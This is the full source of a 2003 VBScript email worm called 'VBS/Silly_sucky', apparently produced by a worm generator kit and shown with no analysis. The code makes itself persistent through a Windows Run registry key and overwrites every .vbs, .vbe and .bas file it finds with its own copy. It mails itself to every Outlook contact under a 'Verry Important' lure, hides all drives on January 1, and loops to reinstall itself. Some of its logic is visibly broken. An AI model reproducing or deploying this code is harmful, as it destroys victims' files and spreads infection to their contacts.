'VBS/Silly_sucky unEncrypted
'Created by sevenC / N0:7
'Generated by SSWG v.0.1 by sevenC
' 1/ 11/ 2003

on error resume next
Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder 
Set fso = createobject("scripting.filesystemobject")
pinker = fso.getspecialfolder(0)
dumbweed = pinker & "\win32aplication.vbs"
Set sevenc = createobject("wscript.shell")
sevenc.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & dumbweed & " %"
fso.copyfile wscript.scriptfullname, dumbweed

Set Drives=fso.drives 
For Each Drive in Drives
If drive.isready then
on error resume next
Set Folder=fso.getfolder(path) 
Set Files = folder.files 
For Each File in files
If fso.GetExtensionName(file.path)="vbs"  or fso.GetExtensionName(file.path)= "vbe"  or fso.GetExtensionName(file.path)= "bas"  then
fso.CopyFile wscript.scriptfullname,file.path,true
end if
next

Set Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
Set Folder=fso.getfolder(path) 
Set Files = folder.files 
For Each File in files
If fso.GetExtensionName(file.path)="vbs"  or fso.GetExtensionName(file.path)= "vbe"  or fso.GetExtensionName(file.path)= "bas"  then
fso.CopyFile wscript.scriptfullname,file.path,true
end if
Next 
if month(now) = 1 and day(now) = 1 then
sevenc.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD"
sevenc.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
msgbox "Happy new year...!!!"
end if

Dim x 
on error resume next 
Set fso ="Scripting.FileSystem.Object"
Set so=CreateObject(fso) 
Set ol=CreateObject("Outlook.Application")
Set out= WScript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1) 
For x=1 To a.AddressEntries.Count 
Set Mail=ol.CreateItem(0) 
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="Verry Important,please checkout this file"
Mail.Body="Verry Important,please checkout this file"
Mail.Attachments.Add Wscript.ScriptFullName
Mail.Send 
Next 
ol.Quit 
next
end if 
next

Set ooooo = fso.opentextfile(wscript.scriptfullname)
oooooo = ooooo.readall
ooooo.close
Do
if not(fso.fileexists(wscript.scriptfullname)) then
set ooooooo= fso.createtextfile(wscript.scriptfullname)
ooooooo.write oooooo
ooooooo.close
end if
ooo = sevenc.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
If ooo <> "C:\windows\win32aplication.vbs" then
sevenc.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "C:\windows\win32aplication.vbs"
end if
ooo= ""
loop


'VBS/Silly_sucky unEncrypted
'Created by sevenC / N0:7
'Generated by SSWG v.0.1 by sevenC
' 1/ 11/ 2003

